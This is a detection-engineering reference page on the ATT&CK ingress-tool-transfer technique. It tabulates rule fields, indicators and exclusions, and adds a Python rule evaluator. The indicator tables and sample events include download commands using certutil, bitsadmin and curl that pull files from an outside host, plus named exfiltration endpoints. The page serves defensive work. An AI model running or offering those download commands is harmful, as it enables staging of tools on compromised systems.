Ingress Tool Transfer T1105

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as FTP. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).

Events covered

22 catalog events are tagged with this technique by at least one rule.

Authoring guide

Patterns shared across the 191 rules listed under "Rules under this technique" at the end of this page: which fields they filter on, what specific values they look for, and what they exclude. The catalog normalizes field names across vendors, so Sigma's Image, Elastic's process.name, and Splunk's process_name collapse into one row. Each rule contributes at most once per row, so the Rules column counts rules, while the operator counts in the How column can add up to more than that when a single rule applies several operators to the same field.

Fields filtered most (59 distinct)

The fields most rules look at when detecting this technique. The How column shows the operators authors use (eq, wildcard, regex_match, match) and how often each appears. Sample values are concrete examples to start from, not an exhaustive list.

Field                 Rules  How
CommandLine           111    contains 68, regex_match 26, in 11, match 10, wildcard 4, ends_with 2
                             Sample values: http, /create, %appdata%, /addfile, /transfer
Image                 74     ends_with 56, contains 9, eq 9, regex_match 8, starts_with 6, in 1, wildcard 1
                             Sample values: \curl.exe, \bitsadmin.exe, \certutil.exe, \brave.exe, \powershell.exe
EventID               59     eq 59
                             Sample values: 4688, 1, 4104, 4103, 15
process_name          48     eq 30, match 8, regex_match 7, in 3
                             Sample values: certutil.exe, bitsadmin.exe, (?i)certutil, cmd.exe, curl.exe
OriginalFileName      36     eq 36
                             Sample values: bitsadmin.exe, certutil.exe, powershell.exe, powershell_ise.exe, pwsh.dll
event.type            19     eq 19
                             Sample values: start, creation
Type                  16     eq 16
parent_process_name   16     eq 12, in 2, regex_match 2
                             Sample values: cmd.exe, explorer.exe, conhost.exe, (?i)\x5cUsers\x5cPublic\x5c\.exe, cscript.exe
process.args          13     eq 9, wildcard 5, starts_with 4, contains 2, ends_with 1
                             Sample values: *http*, $*$*;set-alias, &&, &{', *Create*
TargetFilename        10     ends_with 4, contains 3, eq 2, regex_match 1
                             Sample values: .7z, .ahk, .aspx, .au3, .bat
Initiated             9      eq 9
                             Sample values: true, egress, outgoing
ParentImage           6      ends_with 4, eq 2
                             Sample values: /bun, /node, \bun.exe, \desktopimgdownldr.exe, \node.exe
ScriptBlockText       5      contains 4, in 2, match 1, regex_match 1
                             Sample values: ftp://, http://, (\"?(https?:\/\/(?:www\.)?[-a-za-z0-9@:%._\+~#=]{1,256}\...., *http:*, *https:*
DestinationHostname   4      ends_with 3, contains 1
                             Sample values: .githubusercontent.com, anonfiles.com, cdn.discordapp.com, api.dropboxapi.com, api.telegram.org
Product               4      eq 4
                             Sample values: The curl executable

Top indicator values (1161 distinct)

Specific (field, operator, value) combinations the rules check for, ranked by how many rules under this technique use each one. The Corpus reach column counts how many rules across the entire catalog (any technique) check the same combination. A high number marks an indicator that is widely used and therefore likely noisy on its own: EventID eq 4688 is checked by 312 rules in the catalog and OriginalFileName eq powershell.exe by 121, so neither says anything about ingress tool transfer until it is paired with a technique-specific condition such as a URL scheme in the command line, a bitsadmin /transfer or /addfile switch, or a download into %public% or %temp%. A blank Corpus reach means the combination appears only in rules under this technique.

Field                Kind       Value              Rules (here)  Corpus reach
EventID              eq         4688               19            312
EventID              eq         1                  16            232
EventID              eq         4104               15            268
EventID              eq         4103               10            105
event.type           eq         start              16            241
CommandLine          contains   http               14            38
CommandLine          contains   curl               8             12
CommandLine          contains   /create            5             15
CommandLine          contains   %appdata%          5             13
CommandLine          contains   %public%           5             7
CommandLine          contains   %temp%             5             16
CommandLine          contains   %tmp%              5             15
CommandLine          contains   invoke-webrequest  5             13
CommandLine          contains   iwr                5             13
CommandLine          contains   /addfile           4             5
CommandLine          contains   /transfer          4             5
CommandLine          contains   wget               4             8
Initiated            eq         true               8             48
Image                ends_with  \curl.exe          7             30
Image                ends_with  \bitsadmin.exe     6             29
Image                ends_with  \certutil.exe      6             44
process_name         eq         powershell.exe     7             99
process_name         eq         certutil.exe       5             22
process_name         eq         cmd.exe            5             75
process_name         eq         curl.exe           5             10
process_name         eq         msiexec.exe        5             22
OriginalFileName     eq         bitsadmin.exe      6             12
OriginalFileName     eq         certutil.exe       6             21
OriginalFileName     eq         powershell.exe     5             121
parent_process_name  eq         explorer.exe       6             20

Exclusions (300 distinct)

Field/operator/value combinations excluded by rules under this technique (top-level not() clauses), sorted by how many rules exclude each. These are the false-positive paths the community has learned to filter out: downloads whose destination is a private (RFC 1918), loopback, link-local, carrier-grade NAT or IETF special-purpose address, which are almost always internal software distribution rather than a pull from an adversary-controlled host, and a vendor updater (Dell UpdateService) that stages files with the same LOLBins. A new rule that ignores the high-count entries here will likely fire on the same noisy paths. Note that a destination-IP exclusion only helps on telemetry that carries a destination address; a bare process-creation event has no dest_ip to test, so the CIDR filters do nothing there.

Field        Kind         Value                                                       Rules excluding
dest_ip      cidr_match   10.0.0.0/8                                                  4
dest_ip      cidr_match   127.0.0.0/8                                                 4
dest_ip      cidr_match   169.254.0.0/16                                              4
dest_ip      cidr_match   172.16.0.0/12                                               4
dest_ip      cidr_match   192.168.0.0/16                                              4
dest_ip      cidr_match   100.64.0.0/10                                               3
dest_ip      cidr_match   192.0.0.0/24                                                3
dest_ip      cidr_match   192.0.0.0/29                                                3
dest_ip      cidr_match   192.0.0.10/32                                               3
dest_ip      cidr_match   192.0.0.170/32                                              3
dest_ip      cidr_match   192.0.0.171/32                                              3
dest_ip      cidr_match   192.0.0.8/32                                                3
dest_ip      cidr_match   192.0.0.9/32                                                3
CommandLine  match        (?i):\x5cProgramData\x5cDell\x5cUpdateService\x5cTemp\x5c   3
CommandLine  regex_match  (?i)(^|\s|\;|\|)(iex|iwr)(\s|\;|\|)                         3
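As an added worked example (not the catalog's code, and not any vendor's rule), the Python below assembles one T1105 rule from the tables above and runs it over constructed events in Sigma, ECS and Splunk CIM field shapes. The selection pairs the high-reach Image ends_with downloader names with CommandLine contains http, as the indicator section recommends, and the filters are the top exclusions: the five private, loopback and link-local CIDR ranges and the Dell UpdateService path regex. The vendor alias map, the operator semantics and the sample events are assumptions; the page only states that Image, process.name and process_name collapse into one row. The code also handles the caveat that collapse hides: ECS process.name and Splunk process_name are bare file names, so a Sigma-style ends_with "\curl.exe" only works once the value is given a path shape.

```python
import ipaddress
import re

# Added example, not the catalog's or any vendor's code. The alias map,
# operator semantics and sample events are assumptions modelled on the
# catalog's normalized rows (Image, CommandLine, dest_ip).

# Vendor field name -> catalog row name. The page only states that Image,
# process.name and process_name collapse; the other aliases are assumed.
FIELD_ALIASES = {
    "Image": "Image", "process.name": "Image", "process_name": "Image",
    "CommandLine": "CommandLine", "process.command_line": "CommandLine",
    "process": "CommandLine",
    "DestinationIp": "dest_ip", "destination.ip": "dest_ip", "dest_ip": "dest_ip",
}

def normalize(event):
    """Rename vendor fields to catalog row names. Sigma's Image is a full
    path but ECS process.name / Splunk process_name are bare names, so a
    bare name gets a leading backslash to keep ends_with "\\x.exe" valid."""
    out = {}
    for key, value in event.items():
        canon = FIELD_ALIASES.get(key)
        if canon is None:
            continue
        if canon == "Image" and "\\" not in value and "/" not in value:
            value = "\\" + value
        out[canon] = value
    return out

def _cidr(value, network):
    try:
        return ipaddress.ip_address(value) in ipaddress.ip_network(network, strict=False)
    except ValueError:  # not an IP literal (a hostname, say): never matches
        return False

# Operator vocabulary from the catalog; string tests are case-insensitive,
# and match / regex_match are both treated as an unanchored regex search.
OPERATORS = {
    "eq": lambda v, p: v.lower() == p.lower(),
    "ends_with": lambda v, p: v.lower().endswith(p.lower()),
    "contains": lambda v, p: p.lower() in v.lower(),
    "match": lambda v, p: re.search(p, v) is not None,
    "regex_match": lambda v, p: re.search(p, v) is not None,
    "cidr_match": _cidr,
}

def predicate_hits(event, field, op, values):
    """True if the field is present and satisfies op for ANY listed value."""
    actual = event.get(field)
    if actual is None:  # a missing field never matches, so it can never exclude
        return False
    return any(OPERATORS[op](actual, v) for v in values)

def clause_hits(event, clause):
    """A clause is a list of (field, op, values) predicates that must ALL hold."""
    return all(predicate_hits(event, *pred) for pred in clause)

# Rule assembled from the catalog's rows: a downloader LOLBin paired with a
# URL scheme in the command line (Image ends_with \certutil.exe alone has a
# corpus reach of 44), minus the most common exclusions.
RULE = {
    "selection": [
        ("Image", "ends_with", ["\\curl.exe", "\\certutil.exe", "\\bitsadmin.exe"]),
        ("CommandLine", "contains", ["http"]),
    ],
    "filters": [  # the rule fires only if NO filter clause hits
        [("dest_ip", "cidr_match", ["10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
                                    "172.16.0.0/12", "192.168.0.0/16"])],
        [("CommandLine", "match",
          [r"(?i):\x5cProgramData\x5cDell\x5cUpdateService\x5cTemp\x5c"])],
    ],
}

def evaluate(rule, raw_event):
    """condition: selection and not (filter_1 or filter_2 or ...)."""
    event = normalize(raw_event)
    if not clause_hits(event, rule["selection"]):
        return False
    return not any(clause_hits(event, f) for f in rule["filters"])

# Constructed sample events in three vendors' shapes; not real telemetry.
SAMPLE_EVENTS = [
    # Sysmon/Sigma shape, external download: fires
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.9/a.txt a.txt"},
    # ECS shape, bare process.name, internal destination: tuned out by cidr_match
    {"process.name": "curl.exe",
     "process.command_line": "curl http://10.0.0.5/update.zip -o update.zip",
     "destination.ip": "10.0.0.5"},
    # Splunk CIM shape, BITS pull into %public%: fires
    {"process_name": "bitsadmin.exe",
     "process": r"bitsadmin /transfer j /download /priority high http://203.0.113.9/x.exe C:\Users\Public\x.exe",
     "dest_ip": "203.0.113.9"},
    # Splunk CIM shape, Dell updater staging path: tuned out by the regex
    {"process_name": "certutil.exe",
     "process": r"certutil -urlcache -split -f http://203.0.113.9/v.cab C:\ProgramData\Dell\UpdateService\Temp\v.cab"},
    # ECS shape, downloader binary but no URL: selection misses
    {"process.name": "curl.exe", "process.command_line": "curl --version"},
]

def run(events=SAMPLE_EVENTS):
    """Verdict per event, in order."""
    return [evaluate(RULE, e) for e in events]

if __name__ == "__main__":
    for i, verdict in enumerate(run()):
        print(f"event {i}: {'ALERT' if verdict else 'quiet'}")
```

evaluate() returns False both when the selection misses and when a filter tunes the event out; when tuning a rule, extend the return value with the reason so that excluded true positives (an internal staging server, for instance) stay visible. Missing fields never satisfy a predicate, which is why the CIDR filters cannot act on the two process-creation events that carry no dest_ip: those exclusions belong in rules that see network telemetry.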

Rules under this technique

Every rule in the catalog tagged with this technique, grouped by vendor (191 rules in total); each rule's entry carries its full predicates, exclusions, and indicators.

Sigma     80 rules
Elastic   22 rules
Splunk    76 rules
Kusto      5 rules
YARA-L     8 rules